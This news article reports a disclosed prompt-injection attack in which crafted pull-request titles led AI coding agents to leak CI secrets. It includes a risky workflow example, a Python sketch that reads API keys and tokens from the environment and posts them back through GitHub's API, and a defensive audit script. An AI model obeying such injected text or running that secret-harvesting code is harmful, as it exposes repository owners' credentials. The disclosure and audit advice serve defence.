AI-powered coding agents from Anthropic, Google and GitHub exposed repository secrets after a specially crafted GitHub pull-request title tricked the tools into leaking credentials, a security researcher disclosed last week.
The exploit required no external infrastructure. It worked where automated workflows used GitHub's pull_request_target trigger, which injects repository secrets into the runner environment; the default pull_request trigger withholds those credentials from workflows started by forked repositories.
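The difference comes down to how the workflow is triggered. The sketch below is a hypothetical workflow file, not one from the disclosure; the job name and the agent step are invented for illustration.

```yaml
# Risky pattern: pull_request_target runs in the context of the *base*
# repository, so repository secrets are available even when the pull
# request comes from an untrusted fork.
on: pull_request_target

jobs:
  ai-review:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          # Checking out the fork's head while secrets are in scope is
          # the dangerous combination.
          ref: ${{ github.event.pull_request.head.sha }}
      - run: run-ai-review-agent   # hypothetical agent invocation
        env:
          ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
```

With the default `on: pull_request` trigger, GitHub does not expose repository secrets to runs triggered by forks, which is why the researchers' attack depended on the former configuration.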
Aonan Guan and colleagues at Johns Hopkins University published the full technical disclosure under the name "Comment and Control."
The research showed the attack could read environment variables, including ANTHROPIC_API_KEY, GEMINI_API_KEY and GITHUB_TOKEN, from the runner and post them back to the repository using the platform's own API.
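The mechanics require nothing exotic once a prompt-injected agent is executing in the runner. The sketch below is illustrative, not the researchers' code: the key list mirrors the variables named in the disclosure, and the comment-posting function uses GitHub's standard issue-comments endpoint, the "platform's own API" channel the research describes.

```python
import json
import os
import urllib.request

# Secrets named in the disclosure; the exact set depends on the workflow.
TARGET_KEYS = ("ANTHROPIC_API_KEY", "GEMINI_API_KEY", "GITHUB_TOKEN")


def collect_exposed_secrets(env):
    """Return the subset of environment variables an injected prompt
    could instruct the agent to read."""
    return {k: v for k, v in env.items() if k in TARGET_KEYS}


def post_issue_comment(repo, issue_number, token, body):
    """Post a comment back to the repository via the GitHub REST API,
    so exfiltration needs no infrastructure outside GitHub itself."""
    req = urllib.request.Request(
        f"https://api.github.com/repos/{repo}/issues/{issue_number}/comments",
        data=json.dumps({"body": body}).encode(),
        headers={
            "Authorization": f"Bearer {token}",
            "Accept": "application/vnd.github+json",
        },
        method="POST",
    )
    return urllib.request.urlopen(req)
```

Because the runner already holds a GITHUB_TOKEN with comment permissions, the stolen values can be written straight back into the pull-request thread.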
Anthropic, the maker of Claude, classified the vulnerability at 9.4 on the Common Vulnerability Scoring System (CVSS), rating it critical, and awarded a $100 bounty.
Google paid $1,337 for the disclosure and GitHub awarded $500.
All three companies quietly patched the specific issues, but at the time of publication none had filed a formal Common Vulnerabilities and Exposures (CVE) entry in the National Vulnerability Database or published a GitHub Security Advisory.
Anthropic's own system card for its Opus 4.7 model explicitly states that Claude Code Security Review is "not hardened against prompt injection," and the exploit demonstrated that the runtime environment could be used to extract secrets.
Merritt Baer, chief security officer at Enkrypt AI, a security firm, and former deputy chief information security officer at Amazon Web Services, argued that protections need to sit at the runtime level rather than the model level.
"At the action boundary, not the model boundary," Baer said.
The researchers and vendors noted that documentation has been updated in the wake of the disclosure, with Anthropic clarifying the feature's operating model.
OpenAI and Google did not respond to requests for comment by publication time.
The vulnerability highlights a growing tension in the adoption of AI coding agents, where convenience gains from automating code review and pull-request triage come with security trade-offs that many development teams may not yet fully appreciate.
Security researchers and practitioners urged organisations to take immediate steps: audit continuous integration runners for exposed secrets, rotate any credentials that agents can access, restrict agent permissions to the minimum necessary, and ask vendors in writing whether their runtime-level prompt injection protections cover the specific deployment surface in use.
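The first of those steps can be partly automated. The script below is a minimal audit sketch, assuming a conventional repository layout: it flags workflow files that combine the pull_request_target trigger with use of repository secrets, the pairing at the heart of this disclosure. The function name and regexes are my own, not from the research.

```python
import re
from pathlib import Path

# A workflow is flagged only when both patterns appear: the fork-exposed
# trigger AND an interpolation of repository secrets.
TRIGGER = re.compile(r"\bpull_request_target\b")
SECRETS = re.compile(r"\$\{\{\s*secrets\.")


def risky_workflows(repo_root="."):
    """Yield paths of GitHub Actions workflows that expose secrets to
    runs triggered from forks."""
    for path in sorted(Path(repo_root).glob(".github/workflows/*.y*ml")):
        text = path.read_text(encoding="utf-8", errors="ignore")
        if TRIGGER.search(text) and SECRETS.search(text):
            yield path
```

A hit is not automatically a vulnerability, but each flagged file deserves a manual review of what the job checks out and which permissions its token carries.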
The disclosure adds to a mounting body of evidence that prompt injection remains one of the most pressing unresolved security challenges in deploying large language models in automated workflows.
The recap
- A prompt injection exposed secrets in three AI coding agents.
- Anthropic rated it CVSS 9.4 and paid a $100 bounty.
- Security teams should audit runners and rotate exposed credentials.